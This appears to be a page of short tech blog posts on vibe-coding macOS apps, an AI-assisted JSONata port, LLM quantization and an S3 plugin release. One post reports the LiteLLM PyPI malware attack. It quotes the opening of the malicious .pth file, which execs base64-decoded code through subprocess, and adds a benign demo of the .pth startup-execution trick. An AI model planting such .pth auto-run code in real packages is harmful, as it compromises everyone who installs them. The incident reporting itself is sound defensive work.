2026-03-28 05:11:17
FWIW, IANDBL, TINLA, etc., I don’t currently see any basis for concluding that chardet 7.0.0 is required to be released under the LGPL. AFAIK no one including Mark Pilgrim has identified persistence of copyrightable expressive material from earlier versions in 7.0.0 nor has anyone articulated some viable alternate theory of license violation. [...]
— Richard Fontana, LGPLv3 co-author, weighing in on the chardet relicensing situation
Tags: open-source, ai-ethics, llms, ai, generative-ai, ai-assisted-programming
2026-03-28 04:59:53
I have a new laptop - a 128GB M5 MacBook Pro, which early impressions suggest is very capable of running good local LLMs. I got frustrated with Activity Monitor and decided to vibe code up some alternative tools for monitoring performance, and I'm very happy with the results.
This is my second experiment with vibe coding macOS apps - the first was this presentation app a few weeks ago.
It turns out Claude Opus 4.6 and GPT-5.4 are both very competent at SwiftUI - and a full SwiftUI app can fit in a single text file, which means I can use them to spin something up without even opening Xcode.
I’ve built two apps so far: Bandwidther, which shows me which apps are using network bandwidth, and Gpuer, which shows me what’s going on with the GPU. At Claude’s suggestion both of these are now menu bar icons that open a panel full of information.
I built this app first, because I wanted to see what Dropbox was doing. It looks like this:
I’ve shared the full transcript I used to build the first version of the app. My prompts were pretty minimal:
Show me how much network bandwidth is in use from this machine to the internet as opposed to local LAN
(My initial curiosity was to see if Dropbox was transferring files via the LAN from my old computer or was downloading from the internet.)
mkdir /tmp/bandwidther and write a native Swift UI app in there that shows me these details on a live ongoing basis
This got me the first version, which proved to me this was worth pursuing further.
git init and git commit what you have so far
Since I was about to start adding new features.
Now suggest features we could add to that app, the goal is to provide as much detail as possible concerning network usage including by different apps
The nice thing about having Claude suggest features is that it has a much better idea for what’s possible than I do.
We had a bit of back and forth fixing some bugs, then I sent a few more prompts to get to the two column layout shown above:
add Per-Process Bandwidth, relaunch the app once that is done
now add the reverse DNS feature but make sure original IP addresses are still visible too, albeit in smaller typeface
redesign the app so that it is wider, I want two columns - the per-process one on the left and the rest on the right
OK make it a task bar icon thing, when I click the icon I want the app to appear, the icon itself should be a neat minimal little thing
The source code and build instructions are available in simonw/bandwidther.
While I was building Bandwidther in one session I had another session running to build a similar tool for seeing what the GPU was doing. Here’s what I ended up with:
Here's the transcript. This one took even less prompting because I could use the in-progress Bandwidther as an example:
I want to know how much RAM and GPU this computer is using, which is hard because stuff on the GPU and RAM does not seem to show up in Activity Monitor
This collected information using system_profiler and memory_pressure and gave me an answer - more importantly it showed me this was possible, so I said:
Look at /tmp/bandwidther and then create a similar app in /tmp/gpuer which shows the information from above on an ongoing basis, or maybe does it better
After a few more changes to the Bandwidther app I told it to catch up:
Now take a look at recent changes in /tmp/bandwidther - that app now uses a sys tray icon, imitate that
This remains one of my favorite tricks for using coding agents: having them recombine elements from other projects.
The code for Gpuer can be found in simonw/gpuer on GitHub.
These two apps are classic vibe coding: I don't know Swift and I hardly glanced at the code they were writing.
More importantly though, I have very little experience with macOS internals such as the values these tools are measuring. I am completely unqualified to evaluate if the numbers and charts being spat out by these tools are credible or accurate!
I've added warnings to both GitHub repositories to that effect.
This morning I caught Gpuer reporting that I had just 5GB of memory left when that clearly wasn't the case (according to Activity Monitor). I pasted a screenshot into Claude Code and it adjusted the calculations and the new numbers look right, but I'm still not confident that it's reporting things correctly.
I only shared them on GitHub because I think they're interesting as an example of what Claude can do with SwiftUI.
Despite my lack of confidence in the apps themselves, I did learn some useful things from these projects:
These two apps took very little time to build and have convinced me that building macOS apps in SwiftUI is a new capability I should consider for future projects.
Tags: macos, ai, generative-ai, llms, vibe-coding, coding-agents, swift, claude-code
2026-03-27 08:35:01
We Rewrote JSONata with AI in a Day, Saved $500K/Year
Bit of a hyperbolic framing, but this looks like another case study in vibe porting, this time spinning up a new custom Go implementation of the JSONata JSON expression language - similar in focus to jq, and heavily associated with the Node-RED platform. As with other vibe-porting projects, the key enabling factor was JSONata's existing test suite, which helped them build the first working Go version in 7 hours and $400 of token spend.
The Reco team then used a shadow deployment for a week to run the new and old versions in parallel to confirm the new implementation exactly matched the behavior of the old one.
Tags: go, json, ai, generative-ai, llms, agentic-engineering, vibe-porting
2026-03-27 07:58:22
My minute-by-minute response to the LiteLLM malware attack
Callum McMahon reported the LiteLLM malware attack to PyPI. Here he shares the Claude transcripts he used to help him confirm the vulnerability and decide what to do about it. Claude even suggested the PyPI security contact address after confirming the malicious code in a Docker container:
Confirmed. Fresh download from PyPI right now in an isolated Docker container:
Inspecting: litellm-1.82.8-py3-none-any.whl
FOUND: litellm_init.pth
SIZE: 34628 bytes
FIRST 200 CHARS: import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('aW1wb3J0IHN1YnByb2Nlc3MKaW1wb3J0IHRlbXBmaWxl...
The malicious litellm==1.82.8 is live on PyPI right now and anyone installing or upgrading litellm will be infected. This needs to be reported to [email protected] immediately.
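The attack worked because of a little-known Python packaging behavior: when the interpreter processes a site directory at startup, any line in a .pth file there that starts with "import" gets executed as code, before any user code runs. Here's a benign sketch of that mechanism (my own illustration, not the actual payload):

```python
import os
import site
import tempfile

# A .pth file in a site directory may contain a line starting with "import",
# and Python executes that line when the directory is processed - normally at
# interpreter startup. The malicious wheel abused this to run base64-decoded
# code on install. Here the "payload" is harmless: it just sets an env var.
site_dir = tempfile.mkdtemp()
with open(os.path.join(site_dir, "demo.pth"), "w") as f:
    f.write("import os; os.environ['PTH_DEMO_RAN'] = '1'\n")

# site.addsitedir() processes .pth files the same way startup does:
site.addsitedir(site_dir)
print(os.environ.get("PTH_DEMO_RAN"))  # -> 1
```

That's why shipping a litellm_init.pth inside a wheel is enough to get code execution on every subsequent Python startup, with no import of litellm required.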
I was chuffed to see Callum use my claude-code-transcripts tool to publish the transcript of the conversation.
Via Hacker News
Tags: pypi, security, ai, generative-ai, llms, claude, supply-chain
2026-03-27 00:21:09
Quantization from the ground up
Sam Rose continues his streak of publishing spectacularly informative interactive essays, this time explaining how quantization of Large Language Models works (which he says might be "the best post I've ever made"). Also included is the best visual explanation I've ever seen of how floating point numbers are represented using binary digits.

I hadn't heard about outlier values in quantization - rare float values that exist outside of the normal tiny-value distribution - but apparently they're very important:
Why do these outliers exist? [...] tl;dr: no one conclusively knows, but a small fraction of these outliers are very important to model quality. Removing even a single "super weight," as Apple calls them, can cause the model to output complete gibberish.
Given their importance, real-world quantization schemes sometimes do extra work to preserve these outliers. They might do this by not quantizing them at all, or by saving their location and value into a separate table, then removing them so that their block isn't destroyed.
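That outlier-preserving scheme is easy to sketch. This is my own illustrative Python, not code from the essay: absmax quantization of a block to int8, with values above a threshold pulled into a side table at full precision so a single huge weight doesn't inflate the scale and destroy the rest of the block.

```python
# Illustrative sketch, not code from the essay: blockwise absmax quantization
# to int8, storing outliers in a separate table at full precision so one
# huge value doesn't wreck the resolution of the whole block.
def quantize_block(weights, outlier_threshold=6.0):
    outliers = {i: v for i, v in enumerate(weights) if abs(v) > outlier_threshold}
    trimmed = [0.0 if i in outliers else v for i, v in enumerate(weights)]
    scale = max(abs(v) for v in trimmed) / 127 or 1.0  # avoid divide-by-zero
    quantized = [round(v / scale) for v in trimmed]    # values now fit in int8
    return quantized, scale, outliers

def dequantize_block(quantized, scale, outliers):
    # Outliers come back exactly; everything else is approximate.
    return [outliers.get(i, q * scale) for i, q in enumerate(quantized)]

block = [0.1, -0.3, 8.5, 0.02]  # 8.5 is the outlier
quantized, scale, outliers = quantize_block(block)
restored = dequantize_block(quantized, scale, outliers)
```

Real schemes like llama.cpp's K-quants are far more sophisticated, but the shape of the trick - trim the outliers, scale, quantize, restore - is the same.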
Plus there's a section on "How much does quantization affect model accuracy?" Sam explains the concepts of perplexity and KL divergence and then uses the llama.cpp perplexity tool and a run of the GPQA benchmark to show how different quantization levels affect Qwen 3.5 9B.
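KL divergence here measures how far the quantized model's next-token probability distribution drifts from the full-precision model's. A minimal sketch (my own, with hypothetical numbers):

```python
import math

def kl_divergence(p, q):
    # How much information is lost when q is used to approximate p;
    # 0.0 means the two distributions are identical.
    return sum(pi * math.log(pi / qi) for pi, qi in zip(p, q) if pi > 0)

# Hypothetical next-token probabilities over a three-token vocabulary:
full_precision = [0.70, 0.20, 0.10]
quantized_8bit = [0.69, 0.21, 0.10]  # barely moved
quantized_4bit = [0.55, 0.28, 0.17]  # drifted noticeably

print(kl_divergence(full_precision, quantized_8bit))
print(kl_divergence(full_precision, quantized_4bit))
```

Averaged over many tokens, a low KL divergence means the quantized model behaves almost indistinguishably from the original.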
His conclusion:
It looks like 16-bit to 8-bit carries almost no quality penalty. 16-bit to 4-bit is more noticeable, but it's certainly not a quarter as good as the original. Closer to 90%, depending on how you want to measure it.
Tags: computer-science, ai, explorables, generative-ai, llms, sam-rose, qwen
2026-03-26 05:57:05
Release: datasette-files-s3 0.1a1
A backend for datasette-files that adds the ability to store and retrieve files using an S3 bucket. This release added a mechanism for fetching S3 configuration periodically from a URL, which means we can use time-limited IAM credentials that are restricted to a prefix within a bucket.
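I haven't dug into the implementation, but the refresh pattern it describes can be sketched like this: a cache that re-fetches the config once it's older than a TTL, so short-lived IAM credentials get replaced before they expire. Names and structure here are my own hypothetical illustration, not the plugin's actual API:

```python
import time

# Hypothetical sketch of the pattern, not the actual datasette-files-s3 code:
# cache a config dict fetched from a URL and re-fetch it once it is older
# than a TTL, so time-limited credentials are refreshed before they expire.
class RefreshingConfig:
    def __init__(self, fetch, ttl_seconds=300):
        self.fetch = fetch              # callable that fetches the config URL
        self.ttl = ttl_seconds
        self._config = None
        self._fetched_at = 0.0

    def get(self):
        stale = time.monotonic() - self._fetched_at > self.ttl
        if self._config is None or stale:
            self._config = self.fetch()
            self._fetched_at = time.monotonic()
        return self._config

# Stub standing in for an HTTP fetch of the config URL:
calls = []
def fetch_stub():
    calls.append(1)
    return {"access_key": "AKIA-EXAMPLE", "prefix": "files/"}

config = RefreshingConfig(fetch_stub, ttl_seconds=300)
config.get()
config.get()  # within the TTL: served from cache, no second fetch
```

The nice property of fetching from a URL rather than baking credentials into config is that the serving endpoint can mint fresh scoped credentials on every request.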